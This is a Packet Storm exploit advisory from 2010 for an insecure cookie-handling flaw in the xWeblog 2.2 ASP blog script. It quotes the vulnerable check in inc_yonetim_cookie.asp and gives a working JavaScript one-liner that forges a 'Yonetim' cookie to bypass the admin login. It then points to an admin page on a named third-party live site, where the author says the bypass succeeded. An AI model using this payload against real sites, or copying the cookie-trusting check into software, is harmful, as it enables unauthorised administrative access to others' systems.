xWeblog 2.2 Insecure Cookie Handling

2010-10-11T00:00:00
ID PACKETSTORM:94572
Type packetstorm
Reporter ZoRLu
Modified 2010-10-11T00:00:00

Description

                                        
                                            `1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0  
0 _ __ __ __ 1  
1 /' \ __ /'__`\ /\ \__ /'__`\ 0  
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1  
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0  
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1  
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0  
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1  
1 \ \____/ >> Exploit Database separated by exploit 0  
0 \/___/ type (local, remote, DoS, etc.) 1  
1 1  
0 [+] Site : Inj3ct0r.com 0  
1 [+] Support e-mail : submit[at]inj3ct0r.com 1  
0 0  
1 ########################################### 1  
0 I'm ZoRLu member from Inj3ct0r Team 1  
1 ########################################### 0  
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1  
  
# Title : xWeblog v2.2 Insecure Cookie Handling Vulnerability  
# Script Down. : http://www.aspdunyasi.com/goster.asp?id=19  
# Demo : http://siirdensiire.com/  
# Tested : Windows XP Professional sp3  
# Author : ZoRLu / http://inj3ct0r.com/author/577  
# mail-msn : admin@yildirimordulari.com  
# Home : http://z0rlu.blogspot.com  
# Thanks : http://inj3ct0r.com / http://www.exploit-db.com / http://packetstormsecurity.org / http://shell-storm.org  
# Date : 08/10/2010  
# Tesekkur : r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N  
# Lakirdi : Gecmiyorum Zaman a.k :/  
# Lakirdi : off ulan off / http://www.videokeyfim.net/duruyenin-gugumleri-keklik-gibi-kanadimi-suzmedim-murat-ali-doya-doya-gezmedim-bu-kara-yaziyi-kendim-yazmadim.html  
  
Cookie Exp:  
  
javascript:document.cookie = "Yonetim=kullanici_adi=admin; path=/";  
  
after you go here :  
  
http://siirdensiire.com/makale_ekle.asp  
  
Vuln File:   
  
inc_yonetim_cookie.asp  
  
Vuln Code:  
  
<%   
if not Request.Cookies("Yonetim")("kullanici_adi")="admin" then  
Response.Redirect "default.asp"  
else  
%>  
  
Desc: if I create our cookie like this, maybe we can be login. oh ok I will create our cookie  
  
javascript:document.cookie = "Yonetim=kullanici_adi=admin; path=/";  
  
and I look I done login so its successful  
`